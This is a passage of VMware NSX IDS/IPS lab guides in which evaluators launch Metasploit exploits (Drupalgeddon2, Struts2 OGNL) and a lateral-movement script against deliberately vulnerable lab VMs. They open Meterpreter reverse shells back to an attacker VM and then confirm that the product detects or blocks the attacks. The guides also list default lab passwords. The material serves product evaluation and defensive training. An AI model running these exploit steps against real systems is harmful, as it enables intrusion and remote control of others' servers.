64 | [*] 192.168.10.0/24: - Scanned 180 of 256 hosts (70% complete)
65 | [*] 192.168.10.0/24: - Scanned 205 of 256 hosts (80% complete)
66 | [*] 192.168.10.0/24: - Scanned 233 of 256 hosts (91% complete)
67 | [*] 192.168.10.0/24: - Scanned 256 of 256 hosts (100% complete)
68 | [*] Auxiliary module execution completed
69 | ```
70 |
71 | > **Note**: To reduce the number of OVAs needed for this PoV, each workload VM deployed runs both a vulnerable **Drupal** and a vulnerable **CouchDB** service
72 |
73 | **Initiate DrupalGeddon2 attack against App1-WEB-TIER VM**
74 |
75 | In order to launch the **Drupalgeddon2** exploit against the **App1-WEB-TIER VM**, you can either manually configure the **Metasploit** module, or edit and run a pre-defined script. If you want to go with the script option, skip to step #3 and continue from there.
76 |
77 | 1. To initiate the attack manually, use the Metasploit console you opened earlier. Follow the below steps to initiate the exploit. Hit **enter** between every step.
78 | * Type **use exploit/unix/webapp/drupal_drupalgeddon2** to select the drupalgeddon2 exploit module
79 | * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack. The IP address should match the IP address of **App1-WEB-TIER VM**
80 | * Type **set RPORT 8080** to define the port the vulnerable Drupal service runs on.
81 | * Type **exploit** to initiate the exploit attempt
82 | 2. Skip step #3 and #4, and continue with step #5
83 |
84 | ```console
85 |
86 | msf5 auxiliary(scanner/portscan/tcp) > use exploit/unix/webapp/drupal_drupalgeddon2
87 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
88 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.10.101
89 | RHOST => 192.168.10.101
90 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 8080
91 | RPORT => 8080
92 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
93 | ```
94 | 3. If you want to go with the script option instead, run **sudo nano attack1.rc** and type **VMware1!** when asked for the password.
95 | * Confirm that the **RHOST** line IP address matches with the IP address of **App1-WEB-TIER VM** you saw in the NSX VM Inventory.
96 | * Change this IP address if needed.
97 | * Save your changes and exit **nano**
98 | 4. Type **sudo ./attack1.sh** to initiate the Metasploit script and Drupalgeddon exploit. Next, go to step #6
99 |
100 | 5. Confirm the vulnerable server was sucessfully exploited and a **Meterpreter** reverse TCP session was established from **App1-WEB-TIER VM** back to the **Extermal VM**
101 |
102 | ```console
103 | [*] Started reverse TCP handler on 10.114.209.151:4444
104 | [*] Sending stage (38288 bytes) to 192.168.10.101
105 | [*] Meterpreter session 1 opened (10.114.209.151:4444 -> 192.168.10.101:45032) at 2020-07-20 19:37:29 -0500
106 | ```
107 | 6. **Optionally**, you can now interact with the Meterpreter session. For instance, you can run the below commands to gain more inforation on the exploited **App1-WEB-TIER VM**
108 | * Type **sysinfo** to learn more about the running OS
109 |
110 | ```console
111 | meterpreter > sysinfo
112 | Computer : 273e1700c5be
113 | OS : Linux 273e1700c5be 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
114 | Meterpreter : php/linux
115 | meterpreter > ?
116 | ```
117 | 7. When you are done, type **exit -z** to shut down the Meterpreter session
118 | 8. Type **exit** to exit Metasploit
119 |
120 | **Confirm IDS/IPS Events show up in the NSX Manager UI**
121 | 1. In the NSX Manager UI, navigate to Security --> Security Overview
122 | 2. Under the **Insights** tab, confirm you see a number of attempted intrusion against the **APP-1-WEB-TIER** workload
123 | 
124 | 3. Click **APP-1-WEB-TIER** to open a filtered event view for this workload.
125 | 4. Confirm 2 signatures have fired; one exploit-specific signature for **DrupalGeddon2** and one broad signature indicating the use of a **Remote Code execution via a PHP script**
126 | 
127 | > **Note**: You can zoom in/out to specific times using the timeline slider, filter the Events view based on Severity by selecting the desired severities or filter based on other criteria such as Attacker Target, Attack Type, CVSS, Product Affected or VM Name by using the **Appl Filter** box.
128 | 5. Expand both of the events by clicking the **>** icon on the left side next to severity
129 | 6. For the **DruppalGeddon2** event:
130 | * Confirm that the IP addresses of the attacker and victim match with the **External VM** and **APP-1-WEB-TIER VM** respectlively.
131 | * click the **Purple Bar (Detected Only)** to see details about the exploit attempts. You may see multiple attemts (from different ports) as Metasploit initiated multiple connections
132 | * this event contains vulnerability details including the **CVSS score** and **CVE ID**. Click the **2018-7600** CVE link to open up the **Mittre** CVE page and learn more about the vulnerability.
133 | 7. **Optionally**, you can check the obove details as well for the secondary event (except for the vulnerability details, which are not applicable to this more general signature)
134 |
135 | > **Note**: **Product Affected** incicates the service vulnerable to the exploit a signature is detecting. In this case, you should see **Drupal_Server** as being vulnerable to the **DruppalGeddon2** exploit and **Web_server_Applications** being affected by the more generic **Remote Code Execution** attmept.
136 |
137 | > **Note**: **Attack Target** incicates the kind of service being attacked. This could be a client (in case of a client-side exploit), server, etc. In this case, you should see **Web_server** as the attack target for both events.
138 |
139 | 8. In the **timeline** above, you can click the dots that represent each event to get summarized information.
140 |
141 | You have now successfully completed a simple attack scenario !
142 | In the next exercise, we will run through a more advanced scenario, in which will move the attack beyond the initial exploit against the Drupal web-frontend to a database server running on the internal network and then moving laterally once again to another database server beloging to a different application. This is similar to real-world attacks in which bad actors move within the network in order to get to the high value asset/data they are after. The NSX Distributed IDS/IPS and Distributed Firewall are uniquely positioned at te vNIC of every workload to detect and prevent this lateral movement.
143 |
144 |
145 | Before moving to the next exercise, folow [these instructions](ClearingIDSEvents.md) to clear the IDS events from NSX Manager
146 |
147 | ---
148 |
149 | [***Next Step: 7. Lateral Movement Scenario***](7-DetectinganAdvancedAttack.md)
150 |
--------------------------------------------------------------------------------
/3.1/docs/8-AdvancedConfiguration-302.md:
--------------------------------------------------------------------------------
1 |
2 | ## 8. Advanced Attack and Configuration
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | In this **optional** exercise, we will explore some more advanced options in the NSX Distributed IDS/IPS Configuration
6 | * Tuning IDS/IPS Profile to turn off irrelevant signatures
7 | * Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM
8 |
9 | **Tuning IDS/IPS Profile to turn off irrelevant signatures**
10 |
11 | > **Note**: Within an IDS/IPS Profile, you can define exclusions in order to turn off particular signatures within the context of that profile. Reasons to exclude signatures include false positives, noisy or irrelevant signatures being triggered.
12 |
13 | 1. From the console session with **External VM**, type **sudo msfconsole** to launch **Metasploit**. Enter **VMware1!** if prompted for a password. Follow the below steps to initiate the exploit. Hit **enter** between every step.
14 | * Type **use exploit/multi/http/struts2_namespace_ognl** to select the drupalgeddon2 exploit module
15 | * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack. The IP address should match the IP address of **App1-WEB-TIER VM**
16 | * Type **exploit** to initiate the exploit.
17 |
18 | > **Note**: This exploit will fail as **App1-WEB-TIER VM** is not running an Apache Struts service vulnerable to this exploit.
19 |
20 | ```console
21 | msf5 > use exploit/multi/http/struts2_content_type_ognl
22 | [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
23 | msf5 exploit(multi/http/struts2_content_type_ognl) > set RHOST 192.168.10.101
24 | RHOST => 192.168.10.101
25 | msf5 exploit(multi/http/struts2_content_type_ognl) > set RHOST 192.168.10.101
26 | RHOST => 192.168.10.101
27 | msf5 exploit(multi/http/struts2_content_type_ognl) > exploit
28 |
29 | [*] Started reverse TCP handler on 10.114.209.151:4444
30 | [-] Exploit aborted due to failure: bad-config: Server returned HTTP 404, please double check TARGETURI
31 | [*] Exploit completed, but no session was created.
32 | msf5 exploit(multi/http/struts2_content_type_ognl) >
33 | ```
34 | 2. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Events
35 | 3. Confirm 3 signatures have fired:
36 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638)
37 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M2
38 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3
39 | 
40 | 4. Note that the **affected product** for all these events is **Apache_Struts2** and the severity for all events is **high**.
41 | 5. Now we will turn off these signatures for the **Production** profiles as we are not running **Apache_Struts2** in our production environment.
42 | 6. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Profiles
43 | 7. Click the **3 dots** next to the **Production** profile and click **Edit** to edit the profile.
44 | 8. Click **Select** next to **High Severity Signatures**
45 | 9. In the **Filter** field, type **Apache_Struts2** to find all signatures related to Struts2. Tick the **Checkbox** on top of the exclusion screen to select all filtered signatures.
46 | 
47 | 10. Click **Add** to add the selected signatures to th exclusion list for the **Production** profile.
48 | 11. Click **Save** to save the **Production** profile.
49 |
50 | Now that we have tuned our Profile, we will try the failed exploit attempt again, and confirm this time the signatures don't fire.
51 |
52 | 12. From the already open console session with **External VM**, use the already configured **struts2_namespace_ognl** Metastploit module to launch the exploit attempt again.
53 | * Type **exploit** to initiate the exploit. If you had previously closed Metsploit, then repeat step #1 of this exercise instead to launch the exploit attempt
54 | 13. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Events
55 | 14. Confirm the total number of events or the number of times each **Apache_Struts2** signature fired has not increased.
56 | 
57 | 15. You have now completed this exercise.
58 |
59 | **Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM
60 |
61 | > **Note**: In addition to sending IDS/IPS Events from each distributed IDS/IPS engine, you can send them directly to a Syslog collector or SIEM from each host. Events are sent in the EVE.JSON format for which many SIEMS have pre-existing parsers/dashboards.
62 |
63 | In this exercise, you will learn how to conigure IDS event export from each host to your syslog collector or SIEM of choice. I will use **vRealize Log Insight**. You can use the same or your own SIEM of choice.
64 | We will not cover how to install **vRealize Log Insight** or any other logging platform, but the following steps will cover how to send IDS/IPS evens to an aleady configured collector.
65 |
66 | 1. Login to lab vCenter and click on **Hosts and Clusters**, then select one of the 3 hosts that were deployed.
67 | 2. Click the **Configure** Tab and Scroll down to **System**. Click **Advanced System Settings**
68 | 3. Click the **Edit** button
69 | 4. In the **Filter** field, type **loghost**
70 | 5. Enter the **IP address of your syslog server** in the **Syslog.global.logHost** value field and click **OK** to confirm.
71 | 
72 | 6. Repeat the same for the remaining 2 hosts.
73 | 7. Click on **Firewall** in the same **System** menu
74 | 8. Click the **Edit** button
75 | 9. In the **Filter** field, type **syslog**
76 | 10. Tick the checkbox next to **syslog** to allow outbuound syslog from the host.
77 | 11. Repeat the same for the remaining 2 hosts.
78 | 
79 | 12. Open a terminal session to one of the lab hypervisors , login with **root**/**VMware1!** and execute the below commands to enable IDS log export via syslog
80 | * Type **nsxcli** to enter the NSX CLI on the host
81 | * Type **set ids engine syslogstatus enable** to enable syslog event export
82 | * Confirm syslog event export was succesfully enabled by running the command **get ids engine syslogstatus**
83 |
84 | ```console
85 | [root@localhost:~] nsxcli
86 | localhost> set ids engine syslogstatus enable
87 | result: success
88 |
89 | localhost> get ids engine syslogstatus
90 | NSX IDS Engine Syslog Status Setting
91 | --------------------------------------------------
92 | true
93 | ```
94 | 13. Login to your syslog collector/SIEM and confirm you are receiving logs form each host.
95 | 14. Configure a parser or a filter to only look at IDS events. You can for example filter on the string **IDPS_EVT**.
96 | 
97 | 15. Now we will run the lateral attack scenario we used in an earlier exercise again. This time, use the pre-defined script to run the attack instead of manaully cofiguring the **Metasploit modules**.
98 | 16. Before you execute the script, if you have not previously used it, you need to ensure the IP addresses match your environment. Utype **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses accordingly to match with the IP addresses in your environment.
99 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
100 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
101 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
102 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM RHOST on line 13 should be the IP address of the App2-APP-TIER VM
103 | 17. After saving your changes, run the attack2 script by executing **sudo ./attack2.sh**.
104 | 18. Confirm a total of 3 meterpreter/command shell sessions have been established
105 | 19. Confirm your syslog server/SIEM has received the IDS events, directly from the host
106 | 
107 |
108 | This comnpletes this exercise.
109 |
110 | ---
111 |
112 | [***Next Step: 9. Segmentation***](/docs/9-Segmentation.md)
113 |
--------------------------------------------------------------------------------
/3.1/docs/8-PreventinganAttack.md:
--------------------------------------------------------------------------------
1 |
2 | ## 8. Preventing an Attack
3 | **Estimated Time to Complete: 30 minutes**
4 |
5 | In this exercise, we will show how the NSX Distributed IDS/IPS can not just detect but also prevent an attack. We will run the same attack scenario as before.
6 |
7 | **Tune the Web-FrontEnd Profile**
8 |
9 | In order to prevent an attack, we need to both change the mode in our IDS/IPS rule(s) to **detect and prevent** and ensure that relevant signature actions are set to either **drop** or **reject**.
10 | The default VMware-recommend signature action can be overrided both at the global level, or within a profile. For the purpose of this lab, we will make the modification within the profile.
11 | Besides changing the signature action, you can also disable signatures as the global or per-profile level, which may be needed in case of false-positives.
12 |
13 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Profiles
14 | 2. Click the 3 dots icon next to the **Web-FrontEnd** profile and then click **Edit**.
15 | 3. Click **Manage signatures for this profile**.
16 | 4. In the Filter field, select **Product Affected** and type **drupal_drupal** and click **Apply** to only show the signatures related to Drupal.
17 |
18 | 
19 |
20 | 5. You should see a filtered list with 4 signatures (may be different if you have a different signature package version deployed).
21 | 5. For each of the signatures displayed, set the Action to **Drop** or **Reject**. Click **Apply** to confirm.
22 |
23 | 
24 |
25 | 6. Click **SAVE** to save the changes to the **Web-FrontEnd** profile.
26 |
27 | **Tune the Databases Profile**
28 |
29 | Now we will also set the action for signatures related to **CouchDB** in the **Databases** profile to **Drop**.
30 |
31 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Profiles
32 | 2. Click the 3 dots icon next to the **Databasesprofile** and then click **Edit**.
33 | 3. Click **Manage signatures for this profile**.
34 | 4. You should see a filtered list with 7 signatures (may be different if you have a different signature package version deployed).
35 | 5. Click the selection box on top to select all signatures.
36 | 6. Click the **ACTION** button on top and choose **Drop** to change the action for all selected signatures to **Drop**. Click **Apply** to confirm.
37 | 7. Click **SAVE** to save the changes to the **Databases** profile.
38 |
39 | **Change the IDS/IPS Mode to Detect & Prevent**
40 |
41 | For each IDS/IPS Rule, you can set the mode to **Detect Only** or **Detect & Prevent**. This mode effecively limits the action that can be taken. When deployed in **Detect Only** mode, the only action that will be taken when a signature is triggerd is an **Alert** will be generated, regardless of the action set for the signature. In **Detect & Prevent** mode on the other hand, the action set on each signature is applied.
42 |
43 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Rules
44 | 2. Click the **>** icon to expand the **NSX IDPS Evaluation** Policy. **ADD POLICY**
45 | 3. For both the **App-Tier Policy** and **Web-Tier Policy** rule, change the mode from **Detect Only** to **Detect & Prevent**.
46 |
47 | 
48 |
49 | 4. Click **PUBLISH** to commit the changes.
50 |
51 | **Open a SSH/Console session to the External VM**
52 | 1. If your computer has access to the IP address you've assigend to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
53 | * Username **vmware**
54 | * Password **VMware1!**
55 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
56 |
57 | **Initiate DrupalGeddon2 attack against the App1-WEB-TIER VM (again)**
58 | 1. Type **sudo msfconsole** to launch **Metasploit**. Enter **VMware1!** if prompted for a password. Follow the below steps to initiate the exploit. Hit **enter** between every step.
59 | * Type **use exploit/unix/webapp/drupal_drupalgeddon2** to select the drupalgeddon2 exploit module
60 | * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack. The IP address should match the IP address of **App1-WEB-TIER VM**
61 | * Type **set RPORT 8080** to define the port the vulnerable Drupal service runs on.
62 | * Type **exploit** to initiate the exploit, esbalish a reverse shell
63 |
64 | 2. Confirm that as a **detect & prevent** policy is applied to the WEB-TIER VMs, the exploit attempt was prevented and no meterpreter session was established. Because the initial exploit was not successful, lateral movement to the iternal segment is also prevented.
65 |
66 | ```console
67 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > use exploit/unix/webapp/drupal_drupalgeddon2
68 | [*] Using configured payload php/meterpreter/reverse_tcp
69 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.10.101
70 | RHOST => 192.168.10.101
71 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 8080
72 | RPORT => 8080
73 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
74 |
75 | [*] Started reverse TCP handler on 10.114.209.151:4444
76 | [*] Exploit completed, but no session was created.
77 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) >
78 |
79 | ```
80 | **Confirm IDS/IPS Events show up in the NSX Manager UI**
81 | 1. In the NSX Manager UI, navigate to Security --> Security Overview
82 | 2. Under the **Insights** tab, confirm you see a number of attempted intrusion against the **APP-1-WEB-TIER** workload
83 | 
84 | 3. Navigate to Security --> East West Security --> Distributed IDS
85 | 4. Confirm 2 signatures have fired:
86 | * Signature for **DrupalGeddon2**, with **APP-1-WEB-TIER** as Affected VM
87 | * Signature for **Remote Code execution via a PHP script**, with **APP-1-WEB-TIER** as Affected VM
88 |
89 | 
90 |
91 | 5. Now you can drill down into these events. Click the **>** symbol to the left of the **ET WEB_SPECIFIC_APPS [PT OPEN] Drupalgeddon2 <8.3.9 <8.4.6 <8.5.1 RCE Through Registration Form (CVE-2018-7600)** event near the bottom of the table to expand this event.
92 | * Confirm that the IP addresses of the attacker and victim match with the **External VM** and **APP-1-WEB-TIER VM** respectlively.
93 | * click the **green bar (Prevented)** to see details about the exploit attempts. You may see multiple attemts (from different ports) as Metasploit initiated multiple connections
94 |
95 | 
96 |
97 | You have now successfully prevented the initial exploit and further lateral movement.
98 | This completes this exercise and the lab. You may continue with some optional exercises.
99 |
100 | This completes this exercise and the lab. You may continue with some optional exercises or read the conclusion (see below links)
101 |
102 | Before moving to the next exercise, folow [these instructions](ClearingIDSEvents.md) to clear the IDS events from NSX Manager
103 |
104 | ---
105 |
106 | [***Next Step : (Optional) 9. Logging to an external collector***](9-Logging.md)
107 |
108 | [***Next Step : (Optional) 10. Segmenting the Environment***](10-Segmentation.md)
109 |
110 | [***Next Step : 11. Conclusion***](11-Conclusion.md)
111 |
112 |
113 |
--------------------------------------------------------------------------------
/3.1/docs/9-Logging.md:
--------------------------------------------------------------------------------
1 |
2 | ## 9. Logging to an External Collector
3 | **Estimated Time to Complete: 30 minutes**
4 |
5 | In this **optional** exercise, we will explore some more advanced options in the NSX Distributed IDS/IPS Configuration
6 |
7 | **IMPORTANT**: Prior to this exercise, change the **Mode** for both the **App-Tier** and **Web-Tier** IDS/IPS policy back to **Detect Only**.
8 |
9 |
10 | **Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM**
11 |
12 | > **Note**: In addition to sending IDS/IPS Events from each distributed IDS/IPS engine, you can send them directly to a Syslog collector or SIEM from each host. Events are sent in the EVE.JSON format for which many SIEMS have pre-existing parsers/dashboards.
13 |
14 | In this exercise, you will learn how to conigure IDS event export from each host to your syslog collector or SIEM of choice. I will use **vRealize Log Insight**. You can use the same or your own SIEM of choice.
15 | We will not cover how to install **vRealize Log Insight** or any other logging platform, but the following steps will cover how to send IDS/IPS evens to an aleady configured collector.
16 |
17 | 1. Login to lab vCenter and click on **Hosts and Clusters**, then select one of the 3 hosts that were deployed.
18 | 2. Click the **Configure** Tab and Scroll down to **System**. Click **Advanced System Settings**
19 | 3. Click the **Edit** button
20 | 4. In the **Filter** field, type **loghost**
21 | 5. Enter the **IP address of your syslog server** in the **Syslog.global.logHost** value field and click **OK** to confirm.
22 | 
23 | 6. Repeat the same for the remaining 2 hosts.
24 | 7. Click on **Firewall** in the same **System** menu
25 | 8. Click the **Edit** button
26 | 9. In the **Filter** field, type **syslog**
27 | 10. Tick the checkbox next to **syslog** to allow outbuound syslog from the host.
28 | 11. Repeat the same for the remaining 2 hosts.
29 | 
30 | 12. Open Postman or another API tool and execute the below API PUT call to NSX Manager to retrieve the current syslog configuration. Note the **Revision** number from the API return body.
31 | * URI: https://10.114.222.108/api/v1/global-configs/IdsGlobalConfig (replace IP address with the IP address of your NSX Manager)
32 | * Method: GET
33 | * Authentication: Basic (enter username/password)
34 | 13. Now run a PUT call to enable syslog
35 | * URI: https://10.114.222.108/api/v1/global-configs/IdsGlobalConfig (replace IP address with the IP address of your NSX Manager)
36 | * Method: PUT
37 | * Authentication: Basic (enter username/password)
38 | * Body:
39 | ```console
40 | {
41 | "global_idsevents_to_syslog_enabled": true,
42 | "resource_type": "IdsGlobalConfig",
43 | "_revision": 36 (change this to the revision number from the get call)
44 | }
45 | ```
46 | 
47 |
48 | 14. Login to your syslog collector/SIEM and confirm you are receiving logs form each host.
49 | 15. Configure a parser or a filter to only look at IDS events. You can for example filter on the string **IDPS_EVT**.
50 | 
51 | 16. Now we will run the lateral attack scenario we used in an earlier exercise again. This time, use the pre-defined script to run the attack instead of manaully cofiguring the **Metasploit modules**.
52 | 17. Before you execute the script, if you have not previously used it, you need to ensure the IP addresses match your environment. Type **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses accordingly to match with the IP addresses in your environment.
53 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
54 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
55 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
56 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM RHOST on line 13 should be the IP address of the App2-APP-TIER VM
57 | 17. After saving your changes, run the attack2 script by executing **sudo ./attack2.sh**.
58 | 18. Confirm a total of 3 meterpreter/command shell sessions have been established
59 | 19. Confirm your syslog server/SIEM has received the IDS events, directly from the host
60 | 
61 |
62 | This completes this exercise. Before moving to the next exercise, folow [these instructions](/docs/ClearingIDSEvents.md) to clear the IDS events from NSX Manager
63 |
64 | ---
65 |
66 | [***Next Step : (Optional) 10. Segmenting the Environment***](10-Segmentation.md)
67 |
--------------------------------------------------------------------------------
/3.1/docs/ClearingIDSEvents.md:
--------------------------------------------------------------------------------
1 |
2 | ## Clearing IDS Events from NSX Manager
3 | **For purposes of a demo or PoV, the below describes how IDS events can be cleared from NSX Manager**
4 |
5 |
6 |
7 | 1. Open your ssh client and initiate a session to NSX Manager. Login with the below credentials.
8 | * Username **root**
9 | * Password **VMware1!VMware1!**
10 | 2. Modify the **IP address (--host=10.114.209.149) in the below command to match the IP address of your NSX Manager**. Other values should not be changed
11 | ```console
12 | service idps-reporting-service stop
13 | java -cp /usr/share/corfu/lib/corfudb-tools-3.1.20201022192550.7817.1-shaded.jar org.corfudb.browser.CorfuStoreBrowserMain --host=10.114.209.149 --port=9040 --tlsEnabled=true --keystore=/config/cluster-manager/corfu/private/keystore.jks --ks_password=/config/cluster-manager/corfu/private/keystore.password --truststore=/config/cluster-manager/corfu/public/truststore.jks --truststore_password=/config/cluster-manager/corfu/public/truststore.password --namespace=security_data_service --tablename=ids_event_data --operation=dropTable --diskPath=/tmp
14 | curl -X PUT -H "Content-Type: application/json" "localhost:9200/security_data_service_metadata/_doc/security_data_service?pretty" -d' {"clusterId" : "-1"}'
15 | service idps-reporting-service start
16 | ```
17 | 3. IDS events will now be cleared from the NSX manager and the reporting service will restart. This may take a few moments, but when you login to the NSX Manager UI, you should see the IDS events have been removed. You may have to refresh the UI/webpage a few times. You can now close the ssh session.
18 | ---
19 |
20 | ***Next Step: Continue with the next exercise in the PoV Guide***
21 |
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_1.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_1.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_10.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_10.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_11.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_11.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_12.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_12.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_13.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_13.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_14.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_14.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_15.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_15.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_16.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_16.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_17.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_17.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_18.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_18.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_19.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_19.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_2.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_2.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_20.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_20.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_21.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_21.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_22.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_22.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_23.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_23.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_24.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_24.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_25.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_25.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_26.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_26.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_27.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_27.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_27_SMALL.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_27_SMALL.PNG
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_28.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/3.1/docs/assets/images/IDPS_POC_28.gif
